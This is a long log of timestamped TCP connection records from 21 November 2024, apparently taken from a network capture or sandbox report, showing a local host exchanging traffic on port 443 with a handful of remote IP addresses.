                                                                                                                                                                                                            Nov 21, 2024 15:17:21.810045958 CET49738443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.810060024 CET49738443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.810081005 CET49738443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.811875105 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.811897993 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.812079906 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.812454939 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.812473059 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816358089 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816390991 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816443920 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816474915 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816493034 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.816726923 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.846920967 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.847376108 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.847398996 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.847984076 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.847987890 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.898376942 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.898821115 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.898843050 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.899333000 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.899337053 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.955821037 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.955848932 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.955929041 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.955957890 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.956007004 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.988167048 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.988190889 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.988275051 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.988301039 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.988348007 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.991440058 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.991908073 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.991946936 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.992494106 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:21.992500067 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.007276058 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.007298946 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.007360935 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.007384062 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.007458925 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.028980017 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.029014111 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.029063940 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.029082060 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.029107094 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.029128075 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.136399984 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.136449099 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.136543036 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.136945009 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.136955023 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160584927 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160626888 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160669088 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160697937 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160727978 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.160744905 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176450014 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176491976 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176557064 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176575899 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176598072 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.176616907 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.190159082 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.190186024 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.190244913 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.190262079 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.190308094 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.200973988 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.200993061 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.201056004 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.201064110 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.201098919 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.201118946 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208570004 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208591938 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208606958 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208681107 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208704948 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208717108 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.208754063 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211332083 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211395025 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211472988 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211925030 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211949110 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211980104 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.211987972 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.212014914 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.212033033 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.216207981 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.216305971 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.216375113 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222198963 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222222090 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222265005 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222296000 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222316027 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.222342014 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.232721090 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.232721090 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.232784986 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.232826948 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.240400076 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.240431070 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.240447044 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.240461111 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242716074 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242741108 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242791891 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242803097 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242825031 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.242841005 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.245420933 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.245459080 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.245534897 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.250648975 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.250675917 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.251468897 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.251506090 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.251560926 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.251816988 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.251832008 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.287743092 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.287812948 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.287884951 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.296101093 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.296128988 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.296140909 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.296149015 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.299520969 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.299562931 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.299624920 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.299763918 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.299774885 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350320101 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350383043 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350429058 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350764990 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350778103 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350789070 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.350795031 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.354274988 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.354319096 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.354449987 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.354633093 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.354650974 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.373101950 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.373131037 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.373197079 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.373220921 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.373316050 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382661104 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382702112 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382728100 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382735968 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382771969 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.382786989 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.392266989 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.392285109 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.392359972 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.392368078 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.392410994 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.400562048 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.400583982 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.400645971 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.400664091 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.401627064 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.410808086 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.410826921 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.410887003 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.410898924 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.411659002 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412348986 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412372112 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412415028 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412442923 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412462950 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.412493944 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.419157982 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.419179916 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.419243097 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.419260979 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.419303894 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.428770065 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.428788900 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.428857088 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.428874016 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.429162979 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.443516016 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.443583012 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.443873882 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.444829941 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.444856882 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.444890976 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.444896936 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.449407101 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.449443102 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.449547052 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.449718952 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.449734926 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455226898 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455249071 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455311060 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455336094 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455353022 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.455712080 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.576908112 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.576936960 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.577004910 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.577039003 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.577070951 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.577083111 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.586121082 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.586141109 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.586216927 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.586227894 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.586337090 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.594130993 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.594151020 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.594208956 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.594218969 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.594530106 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599620104 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599647999 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599714041 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599740028 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599792004 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.599792004 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.603395939 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.603415012 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.603488922 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.603497982 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.603568077 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.612767935 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.612783909 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.612870932 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.612879038 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.612920046 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621365070 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621390104 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621440887 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621450901 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621486902 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.621501923 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625677109 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625703096 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625806093 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625806093 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625818968 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.625906944 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.630691051 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.630711079 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.630778074 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.630794048 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.630836010 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638783932 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638803959 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638855934 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638864994 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638900042 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.638921022 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.647032022 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.647051096 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.647141933 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.647154093 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.647285938 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.667941093 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.668006897 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.668020964 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.668031931 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.668101072 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.668101072 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787185907 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787208080 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787264109 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787297964 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787323952 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.787360907 CET49740443192.168.2.6150.171.28.10
